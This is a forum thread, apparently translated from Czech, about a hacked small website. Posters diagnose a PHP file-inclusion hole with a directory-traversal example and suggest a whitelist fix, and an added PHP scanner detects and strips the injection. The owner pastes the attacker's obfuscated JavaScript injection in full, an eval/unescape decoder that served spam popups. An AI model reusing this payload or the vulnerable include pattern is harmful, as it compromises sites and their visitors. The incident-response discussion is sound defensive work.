-
Our website got hacked
Hi,
I have a pretty big problem: somebody hacked www.sdh.velvary.com - now the question is how they got in. Could someone take a look and see if they spot a bug? Anyway, the only thing I'd say is that they didn't get in through PHP injection; ?neco=www.zlyhacker.com/osklivyskript.txt doesn't work.
-
Re: Our website got hacked
-
Re: Our website got hacked
And what exactly did he do there?
-
Re: Our website got hacked
Quote:
Originally posted by
Fox!MURDER
hm, that's wild, so it could be done through PHP injection?
so what do we do about it?
How come that loop gets created???
-
Re: Our website got hacked
Quote:
Originally posted by
Fox!MURDER
Ugh, I clicked on it and it took down my Firefox :lol:.
-
Re: Our website got hacked
But there's only this in there?
So how can what you describe happen? I'm probably a real lamer - please explain
include("./pages/".$strana.".php");
-
Re: Our website got hacked
Quote:
Originally posted by
bless
But there's only this in there?
So how can what you describe happen? I'm probably a real lamer - please explain
include("./pages/".$strana.".php");
ah, now I get it, I'm an idiot - it includes a page in which this very same include("./pages/".$strana.".php"); is written again, so it keeps including itself forever
-
Re: Our website got hacked
Quote:
Originally posted by
bless
ah, now I get it, I'm an idiot - it includes a page in which this very same include("./pages/".$strana.".php"); is written again, so it keeps including itself forever
yep, smart cookie :-)
basically all it takes is to abuse that injection properly, or to find another similar bug ...
the simplest fix for this problem is to write a simple switch
PHP code:
// every page is listed explicitly; any other value of $strana hits default
switch($strana)
{
    case 'jednastranka':
        include('jednastranka.php'); break;
    case 'druhastranka':
        include('druhastranka.php'); break;   // closing quote was missing in the post
    default:
        die("WTF?");
}
it's more work than what you have now, but there's no way to abuse it
whether that's exactly what they hacked you through I can't tell you; given that this is in there, the whole code is probably a mess, so there are 100% more bugs and security holes in it ...
-
Re: Our website got hacked
Ha, too late..
Well, when you expand it, you get
./pages/../index.php
so it looks into pages, goes up one directory, includes index.php, which looks into pages, goes up one directory, includes index.php, which looks into pages, goes up one directory,...
-
Re: Our website got hacked
Quote:
Originally posted by
Fox!MURDER
yep, smart cookie :-)
basically all it takes is to abuse that injection properly, or to find another similar bug ...
the simplest fix for this problem is to write a simple switch
PHP code:
// every page is listed explicitly; any other value of $strana hits default
switch($strana)
{
    case 'jednastranka':
        include('jednastranka.php'); break;
    case 'druhastranka':
        include('druhastranka.php'); break;   // closing quote was missing in the post
    default:
        die("WTF?");
}
it's more work than what you have now, but there's no way to abuse it
whether that's exactly what they hacked you through I can't tell you; given that this is in there, the whole code is probably a mess, so there are 100% more bugs and security holes in it ...
My first pages in PHP :-) - it shows. :-) There can't be more holes in it, there's hardly any other piece of source code in there; there used to be a guestbook, but I think it's deleted by now.
btw, not that I've done anything about it on the remaining sites. :oops:
Well, all the pages in the pages folder had that piece of code with the popups appended on exactly the same day - all the others stayed untouched. anyway, thanks
-
Re: Our website got hacked
Quote:
Originally posted by
Smitka
And what exactly did he do there?
Well, apart from that, there's a popup window on every page for PENIS enlargement - or something like that, or else a link to a casino. And I don't remember putting that there :)
specifically, this is what he inserted:
HTML code:
!-- 859bc67b9ab7ec2e5213ee82a86312ce --><script>document.write(unescape("%3Cscript%3Efunction%20nd4ska%28qk0yx9%29%7Bvar%20mdj0at%3Dnew%20String%28arguments.callee%29%3Bmdj0at%3Dmdj0at.replace%28/%5B%5Ea-z0-9%28%29+_%5C.%2C-%5D+/ig%2C%20%22%22%29.toUpperCase%28%29%2Crosyvr%3D0%2Cun2exd%3D0%2Cv8h4zl%3D%27%27%2Czg0zxo%3D0%3Bfor%28var%20qhmr4f%3D0%3Bqhmr4f%3Cmdj0at.length%3Bqhmr4f++%29zg0zxo+%3Dmdj0at.charCodeAt%28qhmr4f%2C1%29%3Bfor%28rosyvr%3D0%3Brosyvr%3Cqk0yx9.length%3Brosyvr++%29%7Bvar%20ox2e3o%3Dqk0yx9%5Brosyvr%5D%2Cikde49%3Dmdj0at.substr%28un2exd%2C1%29.charCodeAt%280%29%5Ezg0zxo%3Bv8h4zl+%3DString.fromCharCode%28ox2e3o%5Eikde49%29%3Bun2exd++%3Bif%28un2exd%3D%3Dmdj0at.length%29un2exd%3D0%7Ddocument.write%28v8h4zl%29%3Bv8h4zl%3D%27%27%7Dnd4ska%28new%20Array%2829994%2C30070%2C30077%2C30049%2C30061%2C30057%2C30059%2C29984%2C29971%2C29982%2C30007%2C30071%2C30057%2C30072%2C29974%2C30054%2C30005%2C29968%2C30075%2C30055%2C29981%2C29974%2C30066%2C30056%2C30066%2C30072%2C30010%2C30060%2C29965%2C30069%2C30056%2C30030%2C30052%2C29991%2C30014%2C29988%2C30052%2C30060%2C30064%2C30068%2C29964%2C30072%2C30061%2C30073%2C29997%2C30004%2C30005%2C30053%2C29988%2C30069%2C29983%2C30049%2C30001%2C30056%2C29985%2C30049%2C30077%2C29968%2C30062%2C30008%2C30010%2C29967%2C29996%2C29987%2C30010%2C29999%2C30010%2C29958%2C30078%2C30070%2C30038%2C30068%2C30068%2C30066%2C30012%2C30072%2C29998%2C30049%2C30038%2C30077%2C29976%2C30052%2C29959%2C29961%2C29953%2C30019%2C30041%2C29970%2C30001%2C30019%2C30028%2C30022%2C30043%2C30064%2C30010%2C30033%2C30032%2C30046%2C30059%2C30004%2C30008%2C30068%2C29998%2C30054%2C30071%2C30065%2C30050%2C30071%2C30055%2C30032%2C29968%2C30032%2C30003%2C30006%2C30008%2C29993%2C30068%2C30055%2C29972%2C29961%2C30071%2C30064%2C30018%2C30074%2C30003%2C30004%2C29981%2C30065%2C29964%2C29966%2C30061%2C29962%2C30057%2C30056%2C29973%2C30053%2C30073%2C30016%2C30050%2C30057%2C30007%2C30025%2C30061%2C30050%2C29967%2C30066%2C30062%2C30064%2C29996%2C30065%2C30058%2C30066%2C30070%2C299
63%2C30050%2C29977%2C30065%2C30077%2C30013%2C30015%2C30020%2C30061%2C29968%2C29982%2C29975%2C30058%2C29976%2C30060%2C29969%2C30063%2C30049%2C29988%2C30000%2C30058%2C30075%2C29999%2C29996%2C30066%2C30064%2C29953%2C30071%2C30037%2C29965%2C29980%2C30062%2C30000%2C30030%2C30076%2C30053%2C30075%2C29975%2C30029%2C30053%2C30002%2C30025%2C30013%2C30068%2C29983%2C30055%2C30064%2C29995%2C29989%2C30012%2C30065%2C30071%2C30011%2C30070%2C30058%2C29969%2C30069%2C30059%2C30066%2C30058%2C30025%2C30072%2C29973%2C29952%2C29972%2C30009%2C30008%2C29996%2C29966%2C30063%2C30075%2C30063%2C30041%2C30071%2C29994%2C30025%2C29998%2C30076%2C30060%2C30054%2C30061%2C30059%2C30052%2C30037%2C29953%2C30052%2C30061%2C30035%2C30041%2C30072%2C29985%2C30056%2C30053%2C30053%2C30015%2C29998%2C30076%2C30060%2C30054%2C30061%2C30059%2C29982%2C29997%2C29976%2C30058%2C30052%2C30055%2C29989%2C30009%2C30030%2C29976%2C30057%2C29970%2C29963%2C29970%2C29961%2C30055%2C30075%2C29981%2C30051%2C30067%2C30063%2C29993%2C30012%2C29986%2C29978%2C30060%2C30069%2C30071%2C30049%2C29965%2C29958%2C30067%2C30012%2C30003%2C30061%2C29979%2C29965%2C29957%2C29966%2C29967%2C29979%2C29962%2C30061%2C30052%2C30032%2C29988%2C30058%2C29962%2C30076%2C30075%2C30010%2C29981%2C29965%2C29963%2C29979%2C30066%2C30076%2C30056%2C30027%2C30077%2C30060%2C30048%2C30068%2C30077%2C30056%2C29981%2C29956%2C30033%2C29987%2C30014%2C30061%2C29952%2C29953%2C29974%2C30077%2C30053%2C29970%2C30061%2C29955%2C29973%2C29965%2C30050%2C30070%2C29986%2C30058%2C30014%2C29994%2C30046%2C30004%2C30014%2C30070%2C30075%2C30049%2C30073%2C30076%2C30055%2C30003%2C30056%2C30077%2C30065%2C29964%2C30071%2C30005%2C30035%2C30005%2C29963%2C30074%2C30064%2C30076%2C30076%2C30049%2C30041%2C30040%2C30041%2C30051%2C30060%2C29955%2C30072%2C30061%2C30038%2C29972%2C29961%2C30077%2C30067%2C29962%2C30008%2C29998%2C30018%2C30054%2C30074%2C30071%2C29984%2C30003%2C30008%2C30016%2C30010%2C29988%2C29962%2C30068%2C30076%2C30061%2C30009%2C30051%2C30077%2C29965%2C30019%2C30060%2C29955%2C30072%2C300
61%2C30017%2C30002%2C30040%2C30007%2C30010%2C29989%2C30006%2C30005%2C30012%2C29987%2C30016%2C30011%2C29997%2C30064%2C30050%2C30055%2C29977%2C30059%2C29965%2C29990%2C30022%2C30001%2C29969%2C30067%2C29967%2C30049%2C29969%2C29968%2C30072%2C30053%2C30006%2C30078%2C30014%2C30071%2C30059%2C30074%2C30058%2C30067%2C30075%2C30074%2C29968%2C29997%2C30060%2C30051%2C29969%2C30069%2C30078%2C30024%2C30074%2C29985%2C30025%2C29956%2C29963%2C29979%2C29963%2C29972%2C29981%2C30073%2C29953%2C30053%2C30055%2C30070%2C30013%2C30050%2C29994%2C30079%2C29986%2C30077%2C30065%2C30068%2C29965%2C30076%2C30055%2C30073%2C30065%2C30003%2C30050%2C30060%2C30061%2C30071%2C29979%2C30011%2C30003%2C29984%2C30068%2C30049%2C30072%2C29973%2C29987%2C29992%2C30072%2C29967%2C30069%2C30077%2C29987%2C30006%2C30010%2C30027%2C30001%2C30071%2C30046%2C29993%2C30005%2C29986%2C29984%2C30014%2C30065%2C30074%2C29980%2C30056%2C30019%2C30006%2C30031%2C29973%2C29981%2C29973%2C29973%2C30021%2C29997%2C30039%2C30044%2C29952%2C30070%2C29971%2C29982%2C30069%2C30064%2C29962%2C30060%2C30070%2C30070%2C29998%2C30067%2C30064%2C30070%2C30032%2C30078%2C30060%2C30078%2C29969%2C29980%2C30036%2C30070%2C30071%2C30058%2C30074%2C29992%2C30049%2C29967%2C29971%2C30062%2C30071%2C29959%2C30043%2C30057%2C30073%2C29957%2C30032%2C29990%2C29980%2C30064%2C29965%2C30073%2C30002%2C29983%2C30053%2C30072%2C29963%2C30051%2C30061%2C30025%2C29953%2C30074%2C30058%2C30055%2C30033%2C30013%2C29976%2C29967%2C29963%2C29969%2C29972%2C30079%2C30057%2C29980%2C30057%2C30076%2C30004%2C29968%2C29960%2C30061%2C30053%2C30072%2C30048%2C30041%2C29967%2C30078%2C30063%2C29975%2C30073%2C30005%2C29988%2C30007%2C30050%2C30061%2C30063%2C30075%2C30057%2C30059%2C29963%2C30072%2C30035%2C29973%2C29976%2C30055%2C30066%2C30028%2C29994%2C30078%2C30078%2C29975%2C30056%2C30065%2C30003%2C30061%2C29979%2C29965%2C29957%2C29982%2C29970%2C29976%2C29963%2C30053%2C30078%2C30054%2C30005%2C30069%2C30009%2C30040%2C30063%2C30077%2C30058%2C29986%2C29984%2C30071%2C29960%2C29956%2C30033%2C30015%2C299
88%2C29986%2C29980%2C29996%2C30060%2C30054%2C30077%2C30034%2C30059%2C29965%2C30055%2C30007%2C30061%2C30060%2C30065%2C29986%2C30021%2C30074%2C29972%2C30060%2C29984%2C30016%2C30032%2C30075%2C30064%2C30058%2C30019%2C30061%2C30069%2C30055%2C30007%2C29994%2C29993%2C29997%2C29986%2C30019%2C30029%2C30029%2C30006%2C29985%2C30002%2C29999%2C30008%2C30027%2C29998%2C30019%2C29970%2C29963%2C29970%2C30057%2C30061%2C30055%2C29962%2C30071%2C30066%2C30054%2C30055%2C30066%2C29996%2C29983%2C30070%2C30068%2C30079%2C30076%2C29953%2C30025%2C29984%2C30004%2C30068%2C29953%2C30076%2C30049%2C30046%2C29992%2C29989%2C30000%2C30014%2C29990%2C29986%2C30035%2C29989%2C30075%2C29969%2C30070%2C30057%2C30052%2C29977%2C30025%2C29967%2C29983%2C30079%2C30061%2C30068%2C29995%2C30003%2C30004%2C30004%2C30007%2C29994%2C29988%2C29981%2C29976%2C29961%2C30051%2C30053%2C29957%2C30073%2C30005%2C30013%2C29990%2C30019%2C30008%2C29952%2C29988%2C30056%2C29972%2C30020%2C30025%2C30038%2C30026%2C30058%2C30053%2C29975%2C30072%2C30053%2C30007%2C30004%2C29992%2C30008%2C29976%2C29963%2C29978%2C29970%2C29982%2C29980%2C29957%2C30003%2C29957%2C30056%2C29980%2C29954%2C30067%2C30059%2C30078%2C30069%2C30065%2C29981%2C29984%2C29975%2C30070%2C30058%2C29955%2C30073%2C30052%2C30065%2C29983%2C30043%2C29987%2C30006%2C29982%2C30064%2C30064%2C29953%2C30049%2C30049%2C30075%2C30067%2C30012%2C30003%2C30061%2C29979%2C29965%2C29957%2C29969%2C29983%2C29975%2C29982%2C30070%2C30077%2C29965%2C30064%2C30060%2C29964%2C30005%2C29993%2C30012%2C29956%2C30075%2C30076%2C30054%2C30056%2C30072%2C30075%2C30058%2C29994%2C29981%2C30056%2C30061%2C30066%2C30061%2C30064%2C30038%2C30063%2C29958%2C30076%2C29953%2C30066%2C30035%2C29983%2C29998%2C29980%2C30064%2C29965%2C30073%2C30002%2C30069%2C30058%2C30065%2C30072%2C30061%2C30076%2C30033%2C30079%2C30067%2C30065%2C30020%2C29992%2C30011%2C30006%2C30021%2C29990%2C30011%2C30027%2C29993%2C30076%2C29953%2C29968%2C30069%2C30015%2C30049%2C30066%2C30075%2C30065%2C29961%2C30068%2C30034%2C30079%2C30073%2C30066%2C30054%2C299
97%2C29986%2C29988%2C29987%2C30007%2C30037%2C29984%2C29995%2C29996%2C29960%2C29975%2C29980%2C30051%2C29992%2C29966%2C30068%2C29978%2C30070%2C30073%2C30056%2C30035%2C30055%2C29976%2C30064%2C30065%2C30031%2C30002%2C30045%2C29988%2C29991%2C30004%2C30076%2C29973%2C30079%2C30055%2C29962%2C30059%2C30074%2C30062%2C30004%2C30008%2C29982%2C29983%2C30065%2C30058%2C30064%2C29952%2C30057%2C30068%2C29983%2C29977%2C29963%2C30043%2C30059%2C29970%2C29972%2C30016%2C29983%2C30070%2C30068%2C29961%2C29972%2C29979%2C30058%2C30059%2C29995%2C30060%2C30063%2C30070%2C30051%2C30055%2C30072%2C30060%2C30075%2C30038%2C29969%2C29971%2C30065%2C30059%2C30008%2C29993%2C29963%2C29960%2C30057%2C30069%2C30071%2C30075%2C29974%2C30048%2C30074%2C30074%2C30016%2C30043%2C30062%2C29980%2C30060%2C29972%2C30000%2C30003%2C30035%2C29997%2C30007%2C30027%2C29994%2C29984%2C30007%2C29956%2C30074%2C30071%2C29986%2C30021%2C30011%2C30001%2C29989%2C29990%2C30008%2C30049%2C30078%2C30020%2C30066%2C29964%2C30057%2C30008%2C29984%2C30015%2C30020%2C30001%2C30056%2C30074%2C30078%2C29957%2C30071%2C30061%2C29968%2C30073%2C30065%2C30009%2C30014%2C29988%2C29991%2C29985%2C30060%2C30069%2C30059%2C29975%2C30008%2C29980%2C29982%2C29965%2C30040%2C30070%2C29966%2C30062%2C30043%2C30059%2C29961%2C30068%2C30074%2C30077%2C30024%2C30008%2C29988%2C30020%2C30003%2C30015%2C30006%2C29995%2C30003%2C30004%2C30004%2C30065%2C30077%2C30060%2C30038%2C30067%2C30077%2C30061%2C30062%2C29957%2C30069%2C29977%2C30017%2C30033%2C30009%2C30020%2C30044%2C29977%2C29999%2C30053%2C30003%2C29988%2C30015%2C29996%2C30029%2C30047%2C30000%2C29999%2C29998%2C29992%2C29989%2C29992%2C30005%2C29970%2C30060%2C30072%2C29957%2C29983%2C30079%2C30064%2C30014%2C30015%2C29995%2C30020%2C29996%2C30004%2C29996%2C29989%2C29985%2C29996%2C30044%2C30034%2C30041%2C29990%2C30010%2C29986%2C30013%2C29990%2C30016%2C30005%2C30024%2C30015%2C30069%2C30067%2C29961%2C30074%2C29990%2C29966%2C30055%2C30059%2C30033%2C30056%2C30056%2C30054%2C29999%2C30061%2C30057%2C30077%2C30075%2C29955%2C30017%2C300
04%2C30004%2C30001%2C30016%2C30003%2C29994%2C30044%2C29987%2C29998%2C30002%2C30071%2C30060%2C30059%2C29963%2C29995%2C30070%2C29965%2C30054%2C30076%2C30004%2C30039%2C30017%2C29965%2C29974%2C30074%2C30059%2C30015%2C30066%2C30066%2C30059%2C30076%2C29998%2C29980%2C29966%2C30065%2C29981%2C30037%2C29959%2C29981%2C30057%2C30061%2C30061%2C30059%2C30036%2C29961%2C30070%2C29952%2C30041%2C30056%2C29961%2C30058%2C30058%2C30053%2C30009%2C29988%2C30007%2C29976%2C30051%2C30060%2C30076%2C30057%2C30074%2C30071%2C30079%2C29994%2C30010%2C29970%2C29982%2C29980%2C29955%2C29970%2C29954%2C30059%2C29980%2C29973%2C30078%2C30059%2C30011%2C30072%2C29992%2C30037%2C30047%2C30037%2C29989%2C30077%2C30047%2C30005%2C29999%2C29988%2C30026%2C30025%2C29994%2C29986%2C30029%2C30003%2C29993%2C30042%2C29996%2C30057%2C30070%2C30078%2C30064%2C30079%2C29958%2C30006 <!-- [ 859bc67b9ab7ec2e5213ee82a86312ce ] --><script>eval(unescape('function%20gReGf%28eGBl%29%7Bfunction%20uDI%28sPIUY%29%7Bvar%20nQBhco%3DsPIUY.length%3Bvar%20nAIOto%3D0%2Cjob%3D0%3Bwhile%28nAIOto%3CnQBhco%29%7Bjob+%3DsPIUY.charCodeAt%28nAIOto%29*nQBhco%3BnAIOto++%3B%7Dreturn%20%28%27%27+job%29%7D%20%20%20try%20%7Bvar%20bSzEp%3Deval%28%27a+r+gNuNmNeFnTtTs+.1c+aTl1lFeNe1%27.replace%28/%5BFTN1%5C+%5D/g%2C%20%27%27%29%29%2CdwsSZQ%3Dnew%20String%28%29%2CovHvnA%3D0%3BccUIE%3D0%2CvsD%3D%28new%20String%28bSzEp%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%3Bvar%20kMZw%3DuDI%28vsD%29%3BeGBl%3Dunescape%28eGBl%29%3Bfor%28var%20wdIvfg%3D0%3B%20wdIvfg%20%3C%20%28eGBl.length%29%3B%20wdIvfg++%29%7Bvar%20jvdK%3DeGBl.charCodeAt%28wdIvfg%29%3Bvar%20mmpvph%3DvsD.charCodeAt%28ovHvnA%29%5EkMZw.charCodeAt%28ccUIE%29%3BovHvnA++%3BccUIE++%3Bif%28ovHvnA%3EvsD.length%29ovHvnA%3D0%3Bif%28ccUIE%3EkMZw.length%29ccUIE%3D0%3BdwsSZQ+%3DString.fromCharCode%28jvdK%5Emmpvph%29%3B%7Deval%28dwsSZQ%29%3B%20return%20dwsSZQ%3Dnew%20String%28%29%3B%7Dcatch%28e%29%7B%7D%7DgReGf%28%27%2532%2537%2534%2532%2530%2538%2539%2530%2547%2531%2535%2524%257c%257c%2504%2506%2567%2537%25
20%250e%2579%2536%252b%2538%2523%252a%2530%2502%2534%2501%255b%2558%2541%2534%2530%251e%252e%2503%2517%253e%252a%251e%2524%2513%253d%2506%2502%2576%253b%2531%2576%2564%2564%250e%2531%2538%2525%2528%2518%251e%2518%256c%2546%2579%2569%253b%2529%2527%257a%2520%2578%2548%2576%2536%2535%2510%250c%251a%2528%2531%251a%254d%2516%2533%253e%2534%253b%2533%257c%251a%250c%251a%2504%2513%2551%253d%2579%2525%251a%2518%252b%257e%2534%251e%2523%253c%2518%252c%2533%2522%2536%2539%2541%2551%2571%2574%2552%257b%2556%2556%255d%2530%253f%2522%2526%255a%2524%252a%2535%2533%2536%253f%251b%2523%2515%2531%2533%256f%2570%255e%257f%255c%256d%2554%256d%256d%2525%257f%2531%253a%2503%2506%2521%2530%2512%2538%2511%257e%2556%256d%2502%2506%2572%2565%2523%253a%250b%253a%2520%2532%2527%253a%251c%257d%2523%2568%252b%2530%2535%2509%257a%252f%2527%2515%2516%2556%256c%256a%250c%2570%2536%2534%2561%2527%2503%251c%253b%254d%256c%255f%2560%2524%2577%2525%253b%2568%253b%252d%2512%2527%2574%251f%256d%252d%2573%2511%251a%2506%2561%2536%256f%2565%251a%253b%2511%2511%250d%252d%2525%2571%257f%257e%2579%2573%2570%2544%2570%252c%2572%256d%2579%256c%2548%256a%2572%2510%253c%257e%2537%2564%2578%2557%2507%2534%250d%2502%2571%257f%257d%2532%250c%2579%2576%2528%2538%2510%2507%256e%256e%2564%2559%257c%2565%2556%257e%255f%251e%252f%2516%253d%2522%2522%2579%2527%2529%2530%2520%2522%2559%2570%2570%2566%2562%252b%2520%2532%251e%2524%251b%2531%2569%2575%2523%252a%257a%253d%252b%2516%251e%2503%2524%250e%2527%2577%2502%2530%2571%257a%257d%2578%2532%2571%251e%2513%2520%2516%2530%2532%252f%2537%251a%2506%2507%2577%254a%2556%2538%256b%2535%2532%2525%251b%251e%2536%2578%257e%250a%253a%252f%2526%2569%2520%253d%253b%2579%2535%2525%2537%2528%251d%2521%2529%2528%256a%252f%2513%2574%2532%251c%253a%252a%2519%2573%253c%2532%250b%2530%2554%2564%250d%2527%2528%2504%2521%251a%254a%2555%2574%2520%2528%2523%2560%2550%2571%256e%254a%255c%2564%257c%2579%254d%2515%2510%2537%2556%2547%257c%257a%2554%2574%257b%2510%2505%2565%253f%253d%2533%2564%25
45%2573%2577%2556%2503%252f%2517%257f%2538%253c%2538%253b%2520%254f%2574%2561%2543%2564%252a%2511%2560%252a%2548%2536%2531%2515%2529%2514%253d%2510%2539%2503%256e%2532%253f%253b%257f%2565%2571%2569%2543%2540%2559%2558%2522%257f%256f%252e%250f%2532%254d%2516%2525%2530%2535%2537%253d%257b%2546%2568%2577%2502%252f%2539%2574%2531%2543%2542%256f%257c%2573%2519%257b%255f%2573%2573%2557%256d%2569%252e%2532%2536%2535%2534%2537%2512%2561%254c%2541%253f%256c%2576%2562%2569%2555%2572%2574%256a%2561%2543%2549%2548%257c%254b%2567%2544%256b%2560%252d%253e%2537%2520%254f%2521%2531%2528%2505%2551%2530%2528%250d%2517%2534%2537%2535%253b%257f%2543%257c%255c%2546%2575%255e%2554%257e%257d%256d%2523%253b%251d%2528%2576%2532%2528%2507%2505%256a%254b%2569%2513%2506%252b%2520%256c%2526%2509%2506%2500%256a%2525%256b%250a%2516%251e%2514%2524%254b%2564%2506%2527%2519%252a%253d%2539%2574%2508%2528%2518%2524%2568%2569%256b%2523%2534%251c%2577%2529%2531%253f%2529%2538%253d%253d%2524%2553%2557%251b%2502%2568%252b%2527%2503%2510%2500%2572%253c%257c%2563%254f%2557%254c%2575%257b%2531%2528%2501%2523%2515%2532%2507%2511%2501%252a%2534%2514%2559%254d%256d%2539%251b%250d%2516%2528%2538%2530%2538%2550%2550%2534%2530%2539%2534%2577%2528%2570%257a%2568%2546%253e%2568%2567%2570%2514%257f%2509%2570%250d%2552%2505%2545%252d%2560%2521%256e%2525%2556%2511%2568%2515%257e%2523%2534%253f%2537%2517%253f%253e%2524%2509%2526%256f%256e%2502%2546%2548%2529%2560%252e%251a%253c%2514%2530%2519%2533%251e%2528%251e%2501%2508%2535%251d%251b%2549%251e%2529%2575%253b%2533%2574%256b%251c%255c%254a%2542%2567%2533%2520%2518%256c%2504%253a%252b%2573%2577%2562%257e%254a%252f%2552%251f%253c%253e%257a%254e%2558%2513%252b%2511%2527%256a%2503%2529%2537%253c%251e%2536%255a%2516%2538%2527%2538%254d%2524%2510%252f%2541%2532%257a%2509%253f%2525%2533%2572%2502%2500%2571%2529%256b%2572%2521%2550%253e%2509%2571%2570%257e%2577%2532%2568%2526%2571%256e%255a%2553%255c%256a%257c%2506%2514%253b%2536%2536%2539%2550%2519%2565%2538%257a%253f%252c%25
0c%2538%252e%2534%2501%2516%2516%2520%2533%2555%2571%256d%2525%2521%2533%2534%254a%2561%2549%2521%2575%2522%2530%251f%257d%2571%2534%250b%255a%2552%2574%2575%2532%252e%2523%2536%2518%2536%2560%256a%255b%2520%252b%2530%2525%2515%2529%2532%252c%257e%2552%2526%2517%2514%2544%253d%2520%2534%253a%2531%2555%2537%2538%2517%2516%2522%2527%252f%2530%2520%252c%2523%2517%253f%2529%253c%253b%2568%2567%2560%2523%2500%2520%2501%253a%2522%2565%257b%2577%252d%250b%2560%253b%2528%2530%2570%256e%2547%2535%2558%2507%2502%2500%2547%252b%2539%253f%2506%255c%251e%2528%257c%257c%2531%2524%2524%257c%2510%2551%250e%2547%2531%256c%2511%2560%2527%2577%256b%2562%250f%2525%251a%250f%2531%2501%2513%254c%251d%257d%252e%2578%257d%2541%2540%2505%257d%253f%250d%2534%256e%2536%2560%2515%2528%2539%2528%2524%2506%2525%2506%2528%2553%252a%255d%2561%2556%2534%2560%2548%2577%257b%251c%2530%2533%2530%2530%2530%2508%2558%255a%256b%250a%256a%251b%253c%2536%2537%2545%2572%252f%2574%253e%257f%253c%2571%256d%257f%2576%2537%2532%253f%2535%255f%2538%2539%2528%251c%2504%2537%2511%253c%250a%2512%2502%2561%2571%254e%2566%250a%257f%256f%2579%251a%2556%2553%257e%2518%253b%2538%2521%257d%2524%2562%2526%254a%250c%2515%2500%2563%256b%2537%2556%2515%255d%2564%253d%252b%2538%2509%253a%250b%2566%251d%2510%257f%2533%2539%2523%2520%2531%253c%250b%257d%254a%250a%2529%2569%2564%2526%2523%2514%2509%256d%253d%257d%2564%2576%2571%2577%254e%2502%250c%253e%2542%2502%251b%2501%2534%2541%252f%2564%2501%251f%253b%252e%253b%2526%253e%250f%2559%2502%2532%2533%252d%2532%2539%255c%2573%257a%253a%256e%2529%250b%2519%250b%2511%2575%2574%2531%2563%2530%2574%256a%252b%2507%2528%253e%2579%2575%254a%250c%2515%2525%251b%253f%250e%255e%253f%257a%252c%2537%2530%2501%2534%250a%2518%2509%251d%2538%252d%252a%2508%2534%2511%2573%2571%2569%252c%2525%2537%2535%2512%2515%257f%2531%2561%2557%2539%2564%2510%253f%2530%251a%2539%251b%2573%252f%2531%255b%252f%2565%2568%252e%253f%2527%2537%2525%2511%252e%2569%257a%251b%253b%2529%2530%2529%254f%2502%251c%257a%25
39%257d%256a%2579%2559%255c%2557%2529%2551%2570%254a%257a%2542%253a%2536%256d%2576%254e%2535%2566%2515%2579%253f%2527%2548%2519%2555%257b%2569%2521%253f%252b%251d%2570%253a%257b%2569%253d%254b%2559%2573%2502%256e%2577%2531%2526%2526%2543%254c%253a%2559%257b%253e%252c%251a%256c%250c%2578%2530%2500%257d%2566%255b%256d%2577%2504%257d%253b%250a%2514%2550%2502%2567%2568%250d%2525%251b%2505%253e%2525%254f%2532%252a%2538%2524%2579%2501%250e%2522%251a%252b%257b%2504%253d%252d%2509%257f%2574%2525%251a%2538%2566%256d%2563%2542%2564%251d%2570%250d%2539%2577%2579%2568%2502%2537%257a%2528%253d%2577%2516%250c%2528%251e%251f%251b%250c%2520%2519%2538%2544%2555%250e%2523%253f%2539%2520%2536%253e%252a%2572%2518%254e%2503%2539%2526%257f%2525%257b%2565%251d%2578%253d%2518%2533%2576%250e%256e%2510%254c%2552%257a%253d%2561%2561%2510%2555%2535%2540%252d%2526%253b%2539%2528%2578%2567%256f%27%29%3B'));</script><!-- end -->
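An added example, not code from the thread: a small scanner for exactly this kind of injection. Since bless only had FTP and PHP on shared hosting, it is written as a PHP script that you upload next to pages/, run once from the browser (or with php scan.php if you do have CLI access) and delete afterwards. It looks for the marker comment that frames the injected block above (859bc67b9ab7ec2e5213ee82a86312ce ... <!-- end -->) and, as a second indicator, for the document.write(unescape( / eval(unescape( decoder stubs, lists each affected file with its modification time (which, as noted in the thread, all fell on the same day), and only strips the block when CLEAN is set to true. The directory name and the assumption that the closing <!-- end --> comment is present are mine.

```php
<?php
declare(strict_types=1);

// Added example, not the site's code. Assumed: this file sits next to pages/.
// Run it once, read the report, back up the files, then set CLEAN = true and run again.

const SCAN_DIR = __DIR__ . '/pages';                       // assumed location of the infected files
const MARKER   = '859bc67b9ab7ec2e5213ee82a86312ce';      // tag used in the injected comments
const END_TAG  = '<!-- end -->';                           // closes the injected block
const CLEAN    = false;                                    // true = rewrite files in place

// Secondary indicator: decoder stubs such as document.write(unescape("... or eval(unescape('...
const SUSPECT_RE = '~(document\.write|eval)\s*\(\s*unescape\s*\(~i';

/**
 * Returns the file contents with the injected block removed, or null if the
 * block could not be delimited (then the file is reported but not touched).
 */
function strip_injection(string $src): ?string
{
    $start = strpos($src, MARKER);
    if ($start === false) {
        return null;
    }
    // Back up to the "<!--" that opens the marker comment ("<!-- 859b..." or "<!-- [ 859b...").
    // Only accept it if it is within a few bytes, so an unrelated earlier comment is not eaten.
    $open = strrpos(substr($src, 0, $start), '<!--');
    if ($open !== false && $start - $open <= 8) {
        $start = $open;
    }
    $end = strpos($src, END_TAG, $start);
    if ($end === false) {
        return null;                          // unterminated: leave for manual review
    }
    return substr($src, 0, $start) . substr($src, $end + strlen(END_TAG));
}

/** Scans $dir recursively; returns one row per suspicious file. */
function scan(string $dir, bool $clean): array
{
    $rows = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path = $file->getPathname();
        $src  = file_get_contents($path);
        if ($src === false) {
            continue;
        }
        $hasMarker  = strpos($src, MARKER) !== false;
        $hasDecoder = preg_match(SUSPECT_RE, $src) === 1;
        if (!$hasMarker && !$hasDecoder) {
            continue;
        }
        $row = [
            'file'    => $path,
            'mtime'   => date('Y-m-d H:i:s', $file->getMTime()),
            'marker'  => $hasMarker,
            'decoder' => $hasDecoder,
            'cleaned' => false,
        ];
        if ($clean && $hasMarker) {
            $fixed = strip_injection($src);
            if ($fixed !== null && file_put_contents($path, $fixed) !== false) {
                $row['cleaned'] = true;
            }
        }
        $rows[] = $row;
    }
    return $rows;
}

header('Content-Type: text/plain; charset=utf-8');
foreach (scan(SCAN_DIR, CLEAN) as $r) {
    printf("%s  mtime=%s  marker=%s  decoder=%s  cleaned=%s\n",
        $r['file'], $r['mtime'],
        $r['marker'] ? 'yes' : 'no', $r['decoder'] ? 'yes' : 'no',
        $r['cleaned'] ? 'yes' : 'no');
}
```

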